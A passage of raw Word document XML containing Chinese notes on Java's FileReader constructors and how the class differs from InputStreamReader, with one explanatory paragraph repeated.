          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>构造方法摘要</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileReader (File  file) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在给定从中读取数据的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> File </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的情况下创建一个新</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> FileReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileReader (FileDescriptor  fd) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在给定从中读取数据的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> FileDescriptor </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的情况下创建一个新</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> FileReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileReader (String  fileName) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在给定从中读取数据的文件名的情况下创建一个新</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> FileReader  </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>该类与它的父类</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的主要不同在于构造函数，主要区别也就在于构造函数！</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的构造函数中看到，参数为</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStream</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和编码方式，可以看出，</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当要指定编码方式时，必须使用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类；而</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>构造函数的参数与</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileInputStream</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>同，为</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象或表示</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，可以看出，当要根据</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象或者</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>读取一个文件时，用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我想</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>子类的作用也就在于这个小分工吧。该类与它的父类</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的主要不同在于构造函数，主要区别也就在于构造函数！</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的构造函数中看到，参数为</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStream</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和编码方式，可以看出，</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当要指定编码方式时，必须使用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类；而</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>构造函数的参数与</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileInputStream</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>同，为</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象或表示</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，可以看出，当要根据</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象或者</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
